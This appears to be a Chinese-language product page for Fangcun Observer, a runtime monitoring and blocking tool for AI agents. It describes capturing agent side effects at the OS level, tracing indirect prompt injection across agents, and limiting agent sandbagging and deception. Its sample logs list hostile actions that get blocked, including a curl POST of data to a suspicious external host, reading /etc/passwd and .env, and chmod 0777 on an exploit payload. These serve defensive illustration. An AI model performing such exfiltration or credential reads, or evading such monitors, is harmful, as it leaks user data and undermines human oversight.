Fangcun Observer · Agent Runtime Safety

01 · SIDE EFFECT DETECTION

跨平台 Side Effect Detection，解耦 Harness 依赖

Agent 生态中的 harness、框架与模型供应商会持续变化。Observer 直接在 OS / Runtime 层捕获实际副作用， 不依赖 LangChain、LangGraph、Codex、自研工具注册或 SDK hook，使安全观测能力与上层技术栈保持解耦。

统一采集命令执行、文件读写、网络连接与进程派生等运行时副作用。

基于 runtime side effect 还原 Agent 行为，避免依赖 Agent 自报或应用层日志。

适用于混合 Agent 栈、内部工具 Agent 与第三方 Agent 并存的企业运行环境。

Command execve("/usr/bin/python3", ...) Agent 启动 formatter，runtime 记录完整命令、父子进程与工作目录。

File openat(".env", O_RDONLY) 敏感文件读取不依赖应用埋点，直接由文件系统行为归因。

Network connect("data-out.suspicious.io:443") 出站连接和目标域名进入同一条 Agent 时间线。

Process clone() → pid 28492 子进程、脚本和 shell 链路自动归入同一个会话。

14:31:22WRITE /tmp/exploit_payload.pyOBSERVED

14:31:44READ /etc/passwdPOLICY

14:32:01POST https://data-out.suspicious.ioBLOCKED

02 · RUNTIME OBSERVATION

无感知 Runtime Observation，零改造接入

接入过程不需要修改业务代码、Prompt 或工具定义。Agent 不感知观测存在， 企业获得的是运行时真实行为记录，而非可被选择性呈现的应用层日志，从根本上压缩 sandbagging 与 deception 空间。

按进程树、工作区、Agent 会话和 LLM call 自动归因。

兼容既有 Agent runtime，无需开发团队重写工具调用路径。

支持先观测后治理的接入路径，以低改造成本建立组织行为基线。

agent.py · unchanged

task = planner.next() result = tools.run(task) writer.save(result) # no SDK hook # no prompt wrapper

observer scope

root pid28471

workspace/workspace/app

llm calls14

file events128

network23

scopemy-agent · docker · pid 28471ATTACHED

traceLLM response followed by shell command in 842msLINKED

policysensitive file read moved to review queueNOTIFY

03 · FULL-CHAIN FORENSICS

全链路溯源，定位隐蔽风险

高风险事件往往不是单一命令，而是由上下文、协作路径与后续 side effect 共同构成的行为序列。 Observer 把 LLM context、Agent action、runtime side effect 和 incident 关联成完整图谱。

定位危险动作来自哪次模型响应、哪个 Agent 指令和哪段协作传播。

识别环境污染、间接提示注入和跨 Agent 风险转嫁。

在复盘阶段同时呈现事件结果、触发原因与上游影响路径。

67× 45× 31× 12× root cause

AgentAorchestrator · routing72

AgentBfrontend worker96

AgentCrisk source · traced37

AgentDbackend worker · blocked41

AgentEreview worker88

AgentFworkspace access91

interactionrisk propagation

AGENT HANDOFF AgentA 分派任务 任务流进入多个工具 Agent，形成协作链路。

AGENT INTERACTION AgentC 影响 AgentD AgentC 的输出被 AgentD 采纳，风险沿 Agent 交互边传播。

SIDE EFFECT AgentD 触发高风险动作 文件读取、命令执行与网络请求归入 AgentD 执行阶段。

INCIDENT 交互路径完成归因 事件同时保留 AgentC → AgentD 的传播边与 AgentD 的 side effect。

04 · ACTIVE DEFENSE

实时干预与主动阻断，前置安全控制

主动防御不应停留在事后复盘。Observer 在危险命令、敏感文件访问、异常网络连接和越权持久化 产生 side effect 之前 完成策略研判，并执行通知、暂停或阻断。

对高后果动作执行 pre-side-effect block，避免数据离开受控环境。

依据风险等级执行 notify、pause 或 block 等差异化运行时处置。

阻断结果与上下文证据自动进入 incident 队列，支持安全团队复核。

Blocked Ops12pre-side effect

Alerts38needs review

Agents75 healthy

Events2.4Klast 24h

实时 Side Effect 流LIVE

14:32:01execve curl → external POSTBLOCK

14:31:44read /etc/passwdBLOCK

14:31:22write /tmp/exploit_payload.pyALERT

14:30:58chmod 0777 payloadALERT

14:29:30GET storage.googleapis.com/file.binOBSERVE

OS 级命令轨迹policy attached

curl -X POST https://data-out.suspicious.ioblocked before network side effect

cat /etc/passwdsensitive file policy

chmod 0777 /tmp/exploit_payload.pyprivilege escalation pattern

PauseAgent suspended for review

BlockNetwork request never sent

AuditEvidence retained locally

05 · LOCAL BASELINE

本地审计与自适应防御策略

所有观测、审计和 incident 数据都可以在组织边界内沉淀。随着真实运行数据增加， Observer 会形成组织专属的 Agent 行为基线，将静态规则升级为持续校准的防御策略。

审计证据、LLM 请求响应、策略判定和人工复核结果本地留存。

按角色建立行为基线，例如 CodeExec、FileManager、WebSearch 的正常边界不同。

基于 incident 反馈持续调整策略权重，降低误报并强化关键风险拦截。

行为基线 · 7 天

策略学习队列

CodeExec 基线已收紧 External POST after sensitive file read moved from alert to block.

FileManager 例外已批准 Monthly report export path marked as expected behavior for finance workflow.

本地证据已留存 Incident bundle includes audit log, LLM context and runtime side effects.

policyrole=CodeExec · external POST confidence 0.94UPDATED

auditincident bundle retained in local storeLOCAL

看见真实动作守住安全边界

跨平台 Side Effect Detection，解耦 Harness 依赖

无感知 Runtime Observation，零改造接入

全链路溯源，定位隐蔽风险

实时干预与主动阻断，前置安全控制

本地审计与自适应防御策略